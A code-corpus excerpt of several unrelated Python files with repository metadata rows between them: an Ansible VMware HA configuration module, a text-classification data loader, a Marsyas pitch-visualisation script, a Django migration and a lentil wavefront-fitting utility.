                        das_config.admissionControlPolicy.failoverLevel != policy.get('failover_level'):
                    return True
            elif self.params.get('reservation_based_admission_control'):
                policy = self.params.get('reservation_based_admission_control')
                auto_compute_percentages = policy.get('auto_compute_percentages')
                if not isinstance(das_config.admissionControlPolicy, vim.cluster.FailoverResourcesAdmissionControlPolicy) or \
                        das_config.admissionControlPolicy.autoComputePercentages != auto_compute_percentages or \
                        das_config.admissionControlPolicy.failoverLevel != policy.get('failover_level'):
                    return True
                # The percentage fields only matter when not auto-computed.
                if not auto_compute_percentages:
                    if das_config.admissionControlPolicy.cpuFailoverResourcesPercent != policy.get('cpu_failover_resources_percent') or \
                            das_config.admissionControlPolicy.memoryFailoverResourcesPercent != policy.get('memory_failover_resources_percent'):
                        return True
            elif self.params.get('failover_host_admission_control'):
                policy = self.params.get('failover_host_admission_control')
                if not isinstance(das_config.admissionControlPolicy, vim.cluster.FailoverHostAdmissionControlPolicy):
                    return True
                # NOTE: sorts the live config's host list in place so it can be
                # compared against the (sorted) desired list.
                das_config.admissionControlPolicy.failoverHosts.sort(key=lambda h: h.name)
                if das_config.admissionControlPolicy.failoverHosts != self.get_failover_hosts():
                    return True
        if self.changed_advanced_settings:
            return True
        return False
    def configure_ha(self):
        """
        Manage HA Configuration
        """
        changed, result = False, None
        if self.check_ha_config_diff():
            # In check mode we only report that a change would be made.
            if not self.module.check_mode:
                cluster_config_spec = vim.cluster.ConfigSpecEx()
                cluster_config_spec.dasConfig = vim.cluster.DasConfigInfo()
                cluster_config_spec.dasConfig.enabled = self.enable_ha
                if self.enable_ha:
                    vm_tool_spec = vim.cluster.VmToolsMonitoringSettings()
                    vm_tool_spec.enabled = True
                    vm_tool_spec.vmMonitoring = self.params.get('ha_vm_monitoring')
                    vm_tool_spec.failureInterval = self.params.get('ha_vm_failure_interval')
                    vm_tool_spec.minUpTime = self.params.get('ha_vm_min_up_time')
                    vm_tool_spec.maxFailures = self.params.get('ha_vm_max_failures')
                    vm_tool_spec.maxFailureWindow = self.params.get('ha_vm_max_failure_window')
                    das_vm_config = vim.cluster.DasVmSettings()
                    das_vm_config.restartPriority = self.params.get('ha_restart_priority')
                    das_vm_config.isolationResponse = self.host_isolation_response
                    das_vm_config.vmToolsMonitoringSettings = vm_tool_spec
                    das_vm_config.vmComponentProtectionSettings = vim.cluster.VmComponentProtectionSettings()
                    das_vm_config.vmComponentProtectionSettings.vmStorageProtectionForAPD = self.params.get('apd_response')
                    das_vm_config.vmComponentProtectionSettings.vmStorageProtectionForPDL = self.params.get('pdl_response')
                    cluster_config_spec.dasConfig.defaultVmSettings = das_vm_config
                cluster_config_spec.dasConfig.admissionControlEnabled = self.ha_admission_control
                # Exactly one of the three policy dicts can be set (enforced by
                # the module's mutually_exclusive declaration).
                if self.ha_admission_control:
                    if self.params.get('slot_based_admission_control'):
                        cluster_config_spec.dasConfig.admissionControlPolicy = vim.cluster.FailoverLevelAdmissionControlPolicy()
                        policy = self.params.get('slot_based_admission_control')
                        cluster_config_spec.dasConfig.admissionControlPolicy.failoverLevel = policy.get('failover_level')
                    elif self.params.get('reservation_based_admission_control'):
                        cluster_config_spec.dasConfig.admissionControlPolicy = vim.cluster.FailoverResourcesAdmissionControlPolicy()
                        policy = self.params.get('reservation_based_admission_control')
                        auto_compute_percentages = policy.get('auto_compute_percentages')
                        cluster_config_spec.dasConfig.admissionControlPolicy.autoComputePercentages = auto_compute_percentages
                        cluster_config_spec.dasConfig.admissionControlPolicy.failoverLevel = policy.get('failover_level')
                        if not auto_compute_percentages:
                            cluster_config_spec.dasConfig.admissionControlPolicy.cpuFailoverResourcesPercent = \
                                policy.get('cpu_failover_resources_percent')
                            cluster_config_spec.dasConfig.admissionControlPolicy.memoryFailoverResourcesPercent = \
                                policy.get('memory_failover_resources_percent')
                    elif self.params.get('failover_host_admission_control'):
                        cluster_config_spec.dasConfig.admissionControlPolicy = vim.cluster.FailoverHostAdmissionControlPolicy()
                        policy = self.params.get('failover_host_admission_control')
                        cluster_config_spec.dasConfig.admissionControlPolicy.failoverHosts = self.get_failover_hosts()
                cluster_config_spec.dasConfig.hostMonitoring = self.params.get('ha_host_monitoring')
                cluster_config_spec.dasConfig.vmMonitoring = self.params.get('ha_vm_monitoring')
                if self.changed_advanced_settings:
                    cluster_config_spec.dasConfig.option = self.changed_advanced_settings
                try:
                    task = self.cluster.ReconfigureComputeResource_Task(cluster_config_spec, True)
                    changed, result = wait_for_task(task)
                except vmodl.RuntimeFault as runtime_fault:
                    self.module.fail_json(msg=to_native(runtime_fault.msg))
                except vmodl.MethodFault as method_fault:
                    self.module.fail_json(msg=to_native(method_fault.msg))
                except TaskError as task_e:
                    self.module.fail_json(msg=to_native(task_e))
                except Exception as generic_exc:
                    self.module.fail_json(msg="Failed to update cluster"
                                              " due to generic exception %s" % to_native(generic_exc))
            else:
                changed = True
        self.module.exit_json(changed=changed, result=result)
def main():
    """Module entry point: build the argument spec and apply the HA config."""
    argument_spec = vmware_argument_spec()
    argument_spec.update(dict(
        cluster_name=dict(type='str', required=True),
        datacenter=dict(type='str', required=True, aliases=['datacenter_name']),
        # HA
        enable_ha=dict(type='bool', default=False),
        ha_host_monitoring=dict(type='str',
                                default='enabled',
                                choices=['enabled', 'disabled']),
        host_isolation_response=dict(type='str',
                                     default='none',
                                     choices=['none', 'powerOff', 'shutdown']),
        advanced_settings=dict(type='dict', default=dict(), required=False),
        # HA VM Monitoring related parameters
        ha_vm_monitoring=dict(type='str',
                              choices=['vmAndAppMonitoring', 'vmMonitoringOnly', 'vmMonitoringDisabled'],
                              default='vmMonitoringDisabled'),
        ha_vm_failure_interval=dict(type='int', default=30),
        ha_vm_min_up_time=dict(type='int', default=120),
        ha_vm_max_failures=dict(type='int', default=3),
        ha_vm_max_failure_window=dict(type='int', default=-1),
        ha_restart_priority=dict(type='str',
                                 choices=['high', 'low', 'medium', 'disabled'],
                                 default='medium'),
        # HA Admission Control related parameters
        slot_based_admission_control=dict(type='dict', options=dict(
            failover_level=dict(type='int', required=True),
        )),
        reservation_based_admission_control=dict(type='dict', options=dict(
            auto_compute_percentages=dict(type='bool', default=True),
            failover_level=dict(type='int', required=True),
            cpu_failover_resources_percent=dict(type='int', default=50),
            memory_failover_resources_percent=dict(type='int', default=50),
        )),
        failover_host_admission_control=dict(type='dict', options=dict(
            failover_hosts=dict(type='list', elements='str', required=True),
        )),
        apd_response=dict(type='str',
                          choices=['disabled', 'warning', 'restartConservative', 'restartAggressive'],
                          default='warning'),
        pdl_response=dict(type='str',
                          choices=['disabled', 'warning', 'restartAggressive'],
                          default='warning'),
    ))
    module = AnsibleModule(
        argument_spec=argument_spec,
        supports_check_mode=True,
        # Only one admission-control policy may be configured at a time.
        mutually_exclusive=[
            ['slot_based_admission_control', 'reservation_based_admission_control', 'failover_host_admission_control']
        ]
    )
    vmware_cluster_ha = VMwareCluster(module)
    vmware_cluster_ha.configure_ha()
if __name__ == '__main__':
    main()
| 46.640472 | 144 | 0.663985 |
ace963823198047a39ba286d4f4816c8a5ada2a5 | 11,598 | py | Python | tc_all/old20190213/loader.py | zjfjf/text_classification_system | 1e89c1afe6b2cef604306590d4605b01b216f306 | [
"MIT"
] | 2 | 2019-03-07T12:56:53.000Z | 2019-03-11T03:06:36.000Z | tc_all/old20190213/loader.py | zjfjf/text_classification_system | 1e89c1afe6b2cef604306590d4605b01b216f306 | [
"MIT"
] | 2 | 2019-03-03T10:04:54.000Z | 2019-03-03T10:06:57.000Z | tc_all/old20190213/loader.py | zjfjf/text_classification_system | 1e89c1afe6b2cef604306590d4605b01b216f306 | [
"MIT"
] | null | null | null | #!/usr/bin/python
#encoding:utf-8
from collections import Counter
import tensorflow.contrib.keras as kr
import numpy as np
import codecs
import re
import sys
#import jieba
from sklearn.feature_selection import SelectKBest
from sklearn.feature_selection import chi2
import Tools
# Python 2/3 compatibility shim: on py2, reload sys so setdefaultencoding is
# available again and force utf-8 as the default encoding; record which major
# version we are on for the helpers below.
if sys.version_info[0] > 2:
    is_py3 = True
else:
    reload(sys)
    sys.setdefaultencoding("utf-8")
    is_py3 = False
def native_word(word, encoding='utf-8'):
    """Return *word* encoded to bytes on py2, unchanged on py3.

    Useful when a model trained under python3 is loaded under python2.
    """
    return word if is_py3 else word.encode(encoding)
def native_content(content):
    """Return *content* decoded from utf-8 on py2, unchanged on py3."""
    return content if is_py3 else content.decode('utf-8')
def open_file(filename, mode='r'):
    """Open *filename* in a py2/py3-portable way.

    mode: 'r' or 'w' for read or write. On py3 the file is opened as utf-8
    text with undecodable bytes ignored; on py2 the plain built-in open is
    used.
    """
    if not is_py3:
        return open(filename, mode)
    return open(filename, mode, encoding='utf-8', errors='ignore')
def read_file(filename):
    """
    Read a labelled corpus file (one '<label>\\t<content>' record per line).

    Args:
        filename: train/test/val corpus path
    Returns:
        (labels, contents): labels is a list of label strings; contents is a
        list of token lists produced by splitting on punctuation and
        segmenting with jieba.

    NOTE(review): this function calls jieba.lcut, but the 'import jieba'
    statement at the top of this file is commented out -- calling this
    function as-is raises NameError. Re-enable the import before use.
    """
    re_han = re.compile(u"([\u4E00-\u9FD5a-zA-Z0-9+#&\._%]+)") # the method of cutting text by punctuation
    contents,labels=[],[]
    with codecs.open(filename,'r',encoding='utf-8') as f:
        for line in f:
            try:
                line=line.rstrip()
                assert len(line.split('\t'))==2
                label,content=line.split('\t')
                labels.append(label)
                blocks = re_han.split(content)
                word = []
                for blk in blocks:
                    if re_han.match(blk):
                        word.extend(jieba.lcut(blk))
                contents.append(word)
            except:
                # Deliberate best-effort: malformed lines are skipped.
                pass
    return labels,contents
def read_myfile(filename):
    """Read a '<label>\\t<content>' file; return (contents, labels) lists."""
    contents, labels = [], []
    with open_file(filename) as fp:
        for raw in fp:
            try:
                label, content = raw.strip().split('\t')
                # Skip records with an empty content field.
                if content:
                    contents.append(native_content(content))
                    labels.append(native_content(label))
            except:
                # Best-effort: silently drop malformed lines.
                pass
    return contents, labels
def build_vocab(filenames, vocab_dir, vocab_size=8000):
    """
    Build a vocabulary file from one or more segmented corpora.

    Args:
        filenames: iterable of corpus paths (train/test/val)
        vocab_dir: output path for the vocabulary file (one word per line)
        vocab_size: maximum number of vocabulary entries (including '<PAD>')
    Returns:
        None; writes the vocabulary to vocab_dir.
    """
    all_data = []
    for filename in filenames:
        _, data_train = read_file(filename)
        for content in data_train:
            all_data.extend(content)
    counter = Counter(all_data)
    # BUG FIX: 'count_pairs' was referenced below without ever being defined
    # (NameError). Restore the most_common() step used by build_myvocab.
    count_pairs = counter.most_common(vocab_size - 1)
    words, _ = list(zip(*count_pairs))
    # Reserve index 0 for '<PAD>' so all texts can be padded to one length.
    words = ['<PAD>'] + list(words)
    with codecs.open(vocab_dir, 'w', encoding='utf-8') as f:
        f.write('\n'.join(words) + '\n')
def build_myvocab(train_dir, vocab_dir, vocab_size):
    """Build the vocabulary from the training set and write it to disk."""
    texts, _ = read_myfile(train_dir)
    tokens = []
    for doc in texts:
        doc = doc.replace('\r\n', '').strip()  # drop line breaks
        tokens.extend(doc.split(','))
    # Keep the (vocab_size - 1) most frequent tokens.
    most_common = Counter(tokens).most_common(vocab_size - 1)
    vocab_words, _ = list(zip(*most_common))
    # Prepend '<PAD>' so index 0 can pad all texts to the same length.
    vocab_words = ['<PAD>'] + list(vocab_words)
    open_file(vocab_dir, mode='w').write('\n'.join(vocab_words) + '\n')
def build_myvocab_w(train_dir, vocab_dir, vocab_size, train_tfidf_path):
    """
    Build the vocabulary file from a pre-computed TF-IDF bunch.

    The vocabulary is read from the bunch stored at train_tfidf_path and
    written to vocab_dir, one word per line, with a leading '<PAD>' entry.
    train_dir and vocab_size are unused but kept for signature compatibility
    with the other build_myvocab* helpers.
    """
    # BUG FIX: the original fell through with 'words' unbound (NameError)
    # when train_tfidf_path was None; fail fast with a clear error instead.
    if train_tfidf_path is None:
        raise ValueError('train_tfidf_path is required to build the vocabulary')
    trainbunch = Tools.readbunchobj(train_tfidf_path)
    words = trainbunch.vocabulary  # vocabulary of the training TF-IDF space
    # Prepend '<PAD>' so index 0 can pad all texts to the same length.
    words = ['<PAD>'] + list(words)
    # Use a context manager so the output handle is closed deterministically.
    with open_file(vocab_dir, mode='w') as f:
        f.write('\n'.join(words) + '\n')
def build_myvocab_all(train_dir, vocab_dir, vocab_size, word2vec_path):
    """Build the vocabulary file from every word in a word2vec text model.

    train_dir and vocab_size are unused but kept for signature compatibility
    with the other build_myvocab* helpers.
    """
    vocab_words = []
    reader = codecs.open(word2vec_path, 'r', encoding='utf-8')
    header = reader.readline()
    # First line of a word2vec text model: "<word count> <vector dim>".
    voc_size, vec_dim = map(int, header.split(' '))
    current = reader.readline()
    while current:
        try:
            # The first space-separated field of each line is the word.
            vocab_words.append(current.split(' ')[0])
        except:
            # Best-effort: skip malformed lines.
            pass
        current = reader.readline()
    # Prepend '<PAD>' so index 0 can pad all texts to the same length.
    vocab_words = ['<PAD>'] + list(vocab_words)
    open_file(vocab_dir, mode='w').write('\n'.join(vocab_words) + '\n')
def build_myvocab1(train_dir, vocab_dir, vocab_size):
    """Build a chi-squared-selected vocabulary from the training set.

    NOTE(review): several steps here look broken and should be verified
    before use: fit_transform returns a 2-D sample matrix, so 'words' is a
    list of row lists -- dict(zip(words, scores)) would raise TypeError
    (unhashable list keys), and the vocabulary file would contain rows, not
    tokens. Presumably selected feature *names* were intended.
    """
    train, label = read_myfile(train_dir)
    all_data = []
    for line in train:
        #line = line.decode('utf-8')
        line = line.replace('\r\n', '').strip() # drop line breaks
        line = line.split(',')
        all_data.append(line)
    print("all_data")
    print( len(all_data) )
    train_np = np.array(all_data)
    label_np = np.array(label)
    print("train_np.shape")
    print(train_np.shape)
    print("label_np.shape")
    print(label_np.shape)
    model1 = SelectKBest(chi2, k = vocab_size ) # select the k best features
    words = model1.fit_transform(train_np, label_np)# keeps only the k selected features
    scores = model1.scores_ # chi2 score per feature
    words = words.tolist()
    scores = scores.tolist()
    print(len(words))
    print(len(scores))
    dictscores = dict(zip(words, scores))
    # Prepend '<PAD>' so index 0 can pad all texts to the same length.
    words = ['<PAD>'] + list(words)
    open_file(vocab_dir, mode='w').write('\n'.join(words) + '\n')
    return dictscores
def chi(x_train, y_train, feature_size):
    """Select the top feature_size features of x_train via the chi2 test.

    NOTE(review): 'dictscores' is computed but never returned, so this
    function currently returns None and the result is discarded. Also,
    fit_transform returns a 2-D matrix, so 'words' is a list of row lists
    and dict(zip(words, scores)) would raise TypeError on unhashable keys.
    The intent (probably mapping selected feature names to scores) should
    be confirmed before fixing.
    """
    train_np = np.array(x_train)
    label_np = np.array(y_train)
    print("train_np.shape")
    print(train_np.shape)
    print("label_np.shape")
    print(label_np.shape)
    model1 = SelectKBest(chi2, k = feature_size ) # select the k best features
    words = model1.fit_transform(train_np, label_np)# keeps only the k selected features
    scores = model1.scores_ # chi2 score per feature
    words = words.tolist()
    scores = scores.tolist()
    print(len(words))
    print(len(scores))
    dictscores = dict(zip(words, scores))
def read_vocab(vocab_dir):
    """
    Read the vocabulary file written by the build_*vocab helpers.

    Args:
        vocab_dir: path of the vocabulary file (one word per line)
    Returns:
        words: a list of vocabulary words
        word_to_id: a dict mapping each word to its line index
    """
    # Fix: open via a context manager so the codecs handle is closed
    # deterministically (the original left it to the garbage collector).
    with codecs.open(vocab_dir, 'r', encoding='utf-8') as fp:
        words = fp.read().strip().split('\n')
    word_to_id = dict(zip(words, range(len(words))))
    return words, word_to_id
def read_myvocab(vocab_dir):
    """Read the vocabulary file; return (words, word_to_id)."""
    with open_file(vocab_dir) as fp:
        # On py2 each entry is converted to unicode by native_content.
        words = [native_content(line.strip()) for line in fp.readlines()]
    word_to_id = {w: i for i, w in enumerate(words)}
    return words, word_to_id
def read_category():
    """Return the fixed 10-class label set and its label->index mapping.

    Returns:
        categories: a list of label strings
        cat_to_id: a dict mapping each label to its index
    """
    categories = ['体育', '财经', '房产', '家居', '教育', '科技', '时尚', '时政', '游戏', '娱乐']
    cat_to_id = {cat: idx for idx, cat in enumerate(categories)}
    return categories, cat_to_id
def read_mycategory():
    """Return the fixed 8-class label set and its label->index mapping."""
    #categories = ['体育', '财经', '房产', '家居', '教育', '科技', '时尚', '时政', '游戏', '娱乐']
    categories = ['IT', '体育', '军事', '娱乐', '文化', '时政', '汽车', '金融']
    # On py2 each label is converted to unicode by native_content.
    categories = [native_content(c) for c in categories]
    cat_to_id = {cat: idx for idx, cat in enumerate(categories)}
    return categories, cat_to_id
def process_file(filename, word_to_id, cat_to_id, max_length=600):
    """
    Convert a labelled corpus file into padded id sequences.

    Args:
        filename: train/test/val corpus path
        word_to_id: mapping from read_vocab()
        cat_to_id: mapping from read_category()
        max_length: maximum allowed sentence length
    Returns:
        x_pad: id sequences padded/truncated (post) to max_length
        y_pad: one-hot label matrix
    """
    labels, contents = read_file(filename)
    # Tokens missing from the vocabulary are silently dropped.
    data_id = [[word_to_id[w] for w in doc if w in word_to_id] for doc in contents]
    label_id = [cat_to_id[lab] for lab in labels]
    x_pad = kr.preprocessing.sequence.pad_sequences(data_id, max_length, padding='post', truncating='post')
    y_pad = kr.utils.to_categorical(label_id, num_classes=len(cat_to_id))
    return x_pad, y_pad
def myprocess_file(filename, word_to_id, cat_to_id, max_length):
    """Convert a labelled file to padded id sequences and one-hot labels."""
    contents, labels = read_myfile(filename)
    print(len(contents))
    print(len(labels))
    data_id, label_id = [], []
    for idx, doc in enumerate(contents):
        # Tokens missing from the vocabulary are silently dropped.
        data_id.append([word_to_id[w] for w in doc if w in word_to_id])
        label_id.append(cat_to_id[labels[idx]])
    # Pad every text to a fixed length with keras' pad_sequences.
    x_pad = kr.preprocessing.sequence.pad_sequences(data_id, max_length)
    # One-hot encode the labels.
    y_pad = kr.utils.to_categorical(label_id, num_classes=len(cat_to_id))
    return x_pad, y_pad
def batch_iter(x, y, batch_size=64):
    """
    Yield randomly shuffled (x, y) mini-batches.

    Args:
        x: x_pad from process_file()
        y: y_pad from process_file()
    Yields:
        (input_x, input_y) slices of at most batch_size rows
    """
    total = len(x)
    num_batch = int((total - 1) / batch_size) + 1
    # One random permutation shared by x and y keeps pairs aligned.
    order = np.random.permutation(np.arange(total))
    x_shuffled = x[order]
    y_shuffled = y[order]
    for b in range(num_batch):
        lo = b * batch_size
        hi = min((b + 1) * batch_size, total)
        yield x_shuffled[lo:hi], y_shuffled[lo:hi]
def mybatch_iter(x, y, batch_size=64):
    """Generate shuffled mini-batches of (x, y)."""
    n = len(x)
    n_batches = int((n - 1) / batch_size) + 1
    shuffle_idx = np.random.permutation(np.arange(n))
    x_rand, y_rand = x[shuffle_idx], y[shuffle_idx]
    for batch_no in range(n_batches):
        begin = batch_no * batch_size
        end = min(begin + batch_size, n)
        yield x_rand[begin:end], y_rand[begin:end]
#将词向量矩阵(txt)转化为numpy file
def export_word2vec_vectors(vocab, word2vec_path, trimmed_filename):
    """
    Convert a word2vec text model into a numpy embedding matrix.

    Args:
        vocab: word_to_id mapping
        word2vec_path: path of the word-vector text file trained by word2vec
        trimmed_filename: output path for the compressed numpy file
    Returns:
        None; saves the embedding matrix (key 'embeddings') to
        trimmed_filename. Rows for words absent from the model stay zero.
    """
    # Fix: use a context manager so the codecs handle is always closed
    # (the original leaked it).
    with codecs.open(word2vec_path, 'r', encoding='utf-8') as file_r:
        line = file_r.readline()
        # Header line: "<word count> <vector dim>".
        voc_size, vec_dim = map(int, line.split(' '))
        # Embedding matrix, len(vocab) x vec_dim, initialised to zeros.
        embeddings = np.zeros([len(vocab), vec_dim])
        line = file_r.readline()
        while line:
            try:
                items = line.split(' ')
                word = items[0]                                # the token
                vec = np.asarray(items[1:], dtype='float32')   # its vector
                if word in vocab:
                    # Replace the zero row for this word's id by its vector.
                    embeddings[vocab[word]] = np.asarray(vec)
            except:
                # Deliberate best-effort: skip malformed lines.
                pass
            line = file_r.readline()
    np.savez_compressed(trimmed_filename, embeddings=embeddings)
#将词向量矩阵(txt)转化为numpy file
def export_word2vec_vectors_w(vocab, word2vec_path, trimmed_filename):
    """
    Convert a word2vec text model into a numpy embedding matrix.

    Behaviorally identical to export_word2vec_vectors; kept as a separate
    entry point for compatibility with existing callers.

    Args:
        vocab: word_to_id mapping
        word2vec_path: path of the word-vector text file trained by word2vec
        trimmed_filename: output path for the compressed numpy file
    Returns:
        None; saves the embedding matrix (key 'embeddings') to
        trimmed_filename. Rows for words absent from the model stay zero.
    """
    # Fix: use a context manager so the codecs handle is always closed
    # (the original leaked it).
    with codecs.open(word2vec_path, 'r', encoding='utf-8') as file_r:
        line = file_r.readline()
        # Header line: "<word count> <vector dim>".
        voc_size, vec_dim = map(int, line.split(' '))
        # Embedding matrix, len(vocab) x vec_dim, initialised to zeros.
        embeddings = np.zeros([len(vocab), vec_dim])
        line = file_r.readline()
        while line:
            try:
                items = line.split(' ')
                word = items[0]                                # the token
                vec = np.asarray(items[1:], dtype='float32')   # its vector
                if word in vocab:
                    # Replace the zero row for this word's id by its vector.
                    embeddings[vocab[word]] = np.asarray(vec)
            except:
                # Deliberate best-effort: skip malformed lines.
                pass
            line = file_r.readline()
    np.savez_compressed(trimmed_filename, embeddings=embeddings)
def get_training_word2vec_vectors(filename):
    """
    Load the embedding matrix saved by export_word2vec_vectors*.

    Args:
        filename: path of the compressed numpy (.npz) file
    Returns:
        the 'embeddings' matrix of vocabulary vectors
    """
    npz = np.load(filename)
    with npz:
        return npz["embeddings"]
| 27.746411 | 104 | 0.707622 |
ace9647b8c9313946e9d91fc2f215256be709433 | 1,826 | py | Python | marsyas-vamp/marsyas/src/marsyas_python/pitchBall.py | jaouahbi/VampPlugins | 27c2248d1c717417fe4d448cdfb4cb882a8a336a | [
"Apache-2.0"
] | null | null | null | marsyas-vamp/marsyas/src/marsyas_python/pitchBall.py | jaouahbi/VampPlugins | 27c2248d1c717417fe4d448cdfb4cb882a8a336a | [
"Apache-2.0"
] | null | null | null | marsyas-vamp/marsyas/src/marsyas_python/pitchBall.py | jaouahbi/VampPlugins | 27c2248d1c717417fe4d448cdfb4cb882a8a336a | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# This is an ambient sound analyzer that will:
# - Get sound from the microphone
# - Show a graphical representation of the parameters of that sound
from pylab import *
from marsyas import *
from marsyas_util import *
from visual import *
# NOTE(review): this is a Python 2 script (statement-form 'print' below) that
# needs a live audio input plus the marsyas and visual (VPython) libraries;
# the main loop below runs forever until interrupted.
# For step one, we will create the following marsyas network:
# ADC ==> pitch extractor ==> output1
spec = ["Series/system", ["AudioSource/asrc", "AubioYin/pitcher"]];#"SoundFileSink/dest"]];#, "AubioYin/pitcher"]];
#spec = ["Series/system", ["AudioSource/asrc", "Rms/pitcher"]];#"SoundFileSink/dest"]];#, "AubioYin/pitcher"]];
net = create(spec)
# We will configure the network:
gain = 1.0;
sropt = 44100.0;
copt = 1;
net.updControl("mrs_natural/inSamples", 2048);
net.updControl("mrs_real/israte", sropt);
net.updControl("AudioSource/asrc/mrs_natural/nChannels", copt);
net.updControl("AudioSource/asrc/mrs_real/gain", gain);
net.updControl("AudioSource/asrc/mrs_bool/initAudio", marsyas.MarControlPtr.from_bool(True));
#net.updControl("AubioYin/pitcher/mrs_real/tolerance", 0.3);
#net.updControl("SoundFileSink/dest/mrs_string/filename", "test.wav");
# Now, we should have some visualization tool. This program uses the visual python library to work that out, so:
ball = sphere(pos = (0, 0, 0), radius = 1, color = (1, 0, 0))
# This program will do the following:
# Tick the network
# Low-pass the output using a exponent-decay filter with known coefficient
# Color the sphere so it is brighter for trebble sounds
filteredout = 0;
alpha = 0.9;
#print "GO GO GO!"
while 1:
    net.tick();
    # We will link a variable to the output control...
    output = net.getControl("mrs_realvec/processedData").to_realvec()
    # Exponential smoothing of the raw pitch estimate.
    filteredout = filteredout*alpha + (1-alpha)*output[0]
    print output[0], filteredout
    # assumes pitch values stay below ~1000 so 'red' lands in [0, 1] --
    # TODO confirm; out-of-range values would produce invalid color channels.
    red = output[0]/1000.0;
    ball.color = vector(1-red, red, 0);
ace964c4295160cd037643e51eb7a11fc27dd37e | 645 | py | Python | matches/migrations/0001_initial.py | asyler/betleague | 2ae43ae26d6a6c8582a831bc56c2144ed3134202 | [
"MIT"
] | null | null | null | matches/migrations/0001_initial.py | asyler/betleague | 2ae43ae26d6a6c8582a831bc56c2144ed3134202 | [
"MIT"
] | 1 | 2017-12-14T07:42:02.000Z | 2017-12-14T10:22:19.000Z | matches/migrations/0001_initial.py | asyler/betleague | 2ae43ae26d6a6c8582a831bc56c2144ed3134202 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2017-08-20 13:24
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Initial schema migration: creates the ``Match`` table.

    Auto-generated by Django 1.11.4; normally not edited by hand.
    """

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Match',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('home_team', models.TextField()),
                ('away_team', models.TextField()),
                ('datetime', models.DateTimeField()),
            ],
        ),
    ]
| 25.8 | 114 | 0.570543 |
ace9655c866450aaaf02551d8c8eacdd1b8c67cc | 12,425 | py | Python | lentil/wavefront_utils.py | samkberry/lentil | 161b64449cd0f2278af9554ba2a7d6b2da0e532b | [
"BSD-3-Clause"
] | 2 | 2021-12-17T08:49:40.000Z | 2021-12-18T11:56:39.000Z | lentil/wavefront_utils.py | samkberry/lentil | 161b64449cd0f2278af9554ba2a7d6b2da0e532b | [
"BSD-3-Clause"
] | null | null | null | lentil/wavefront_utils.py | samkberry/lentil | 161b64449cd0f2278af9554ba2a7d6b2da0e532b | [
"BSD-3-Clause"
] | null | null | null | import random
import multiprocessing
import lentil.constants_utils
from lentil.constants_utils import *
from lentil.focus_set import FocusSet, read_wavefront_data
# from lentil.focus_set import estimate_focus_jitter
# use_cuda = wavefront_config.USE_CUDA
from lentilwave.encode_decode import convert_wavefront_dicts_to_p_dicts
from lentilwave import config, TestSettings, TestResults
from lentilwave.generation import generate
class TerminateOptException(Exception):
    # NOTE(review): no raise sites visible in this chunk; the name suggests it
    # aborts an optimisation run early -- confirm against callers.
    pass
def cauchy_fit(x, y):
    """Fit the project's Cauchy-shaped peak model to (x, y) samples.

    The fit is weighted so that samples near the maximum of ``y`` dominate.
    Returns the fitted parameter tuple from ``scipy.optimize.curve_fit`` for
    the ``cauchy`` model imported from ``lentil.constants_utils``.
    """
    meanpeak_idx = np.argmax(y)
    meanpeak_pos = x[meanpeak_idx]
    meanpeak = y[meanpeak_idx]
    # highest_data_y = y_values[highest_data_x_idx]
    # print(highest_data_x_idx)
    # Local x spacing at the peak (fall back to the sample to the right when
    # the peak sits on the left edge).
    if meanpeak_idx > 0:
        x_inc = x[meanpeak_idx] - x[meanpeak_idx - 1]
    else:
        x_inc = x[meanpeak_idx + 1] - x[meanpeak_idx]
    # y_values = np.cos(np.linspace(-6, 6, len(x))) + 1
    # Distance-from-peak measured in cumulative-gradient terms, so flat tails
    # count as "far" even when geometrically close.
    absgrad = np.abs(np.gradient(y)) / meanpeak
    gradsum = np.cumsum(absgrad)
    distances_from_peak = np.abs(gradsum - np.mean(gradsum[meanpeak_idx:meanpeak_idx + 1]))
    shifted_distances = interpolate.InterpolatedUnivariateSpline(x, distances_from_peak, k=1)(
        x - x_inc * 0.5)
    weights = np.clip(1.0 - shifted_distances * 1.3, 1e-1, 1.0) ** 5
    fitfn = cauchy
    optimise_bounds = fitfn.bounds(meanpeak_pos, meanpeak, x_inc)
    # curve_fit treats larger sigma as a lower weight, hence the inversion.
    sigmas = 1. / weights
    initial = fitfn.initial(meanpeak_pos, meanpeak, x_inc)
    fitted_params, _ = optimize.curve_fit(fitfn, x, y,
                                          bounds=optimise_bounds, sigma=sigmas, ftol=1e-5, xtol=1e-5,
                                          p0=initial)
    return fitted_params
def get_weights(shape, focus_values, centre):
    """Build a squared (n_freqs, n_focus) weight grid for the fit.

    The grid is the product of a focus taper (samples far from ``centre``
    fall toward ``config.EXTREME_FOCUS_WEIGHT``) and a frequency taper
    (rows ramp linearly toward ``config.HIGH_FREQUENCY_WEIGHT``).
    """
    deviations = np.abs(focus_values - centre)
    focus_taper = 1.0 - deviations / deviations.max() * (1.0 - config.EXTREME_FOCUS_WEIGHT)
    freq_taper = np.linspace(1.0, config.HIGH_FREQUENCY_WEIGHT, shape[0]).reshape((shape[0], 1))
    grid = np.repeat(focus_taper[np.newaxis, :], shape[0], axis=0) * freq_taper
    return grid ** 2
def _process_focusset(num):
    """Worker: load/analyse one focus set and return a populated FocusSetData.

    ``num`` indexes the module-level ``focussets_`` list; the trailing-
    underscore globals (``fs_slices_``, ``skip_`` etc.) are installed by the
    pool initializer in ``pre_process_focussets``.
    """
    # ob_ = 2
    # fs_slices_ = 0
    # skip_ = 0
    focusset = focussets_[num]
    # A string entry is a path: load it here (in the worker) and return it
    # alongside the data so the parent can keep the loaded object.
    if type(focusset) is str:
        focusset = FocusSet(rootpath=focusset, use_calibration=True, include_all=True, load_complex=complex_otf_)
        return_focusset = True
    else:
        return_focusset = False
    wfd = [("", {})]
    ps = None
    # Decide whether defocus-step/offset hints must be estimated or can be
    # recovered from previously saved wavefront data.
    if not from_scratch_ and num == 0:
        wfd = focusset.read_wavefront_data(overwrite=True, x_loc=x_loc_, y_loc=y_loc_)
        if wfd[-1][1] != {}:
            try:
                ps = convert_wavefront_dicts_to_p_dicts(wfd[-1][1])
                p = ps[0]
                if 'df_step' in ps[0] and 'df_offset' in ps[0]:
                    hints_needed = False
                else:
                    hints_needed = True
            except IndexError:
                p = None
                hints_needed = True
        else:
            p = None
            hints_needed = True
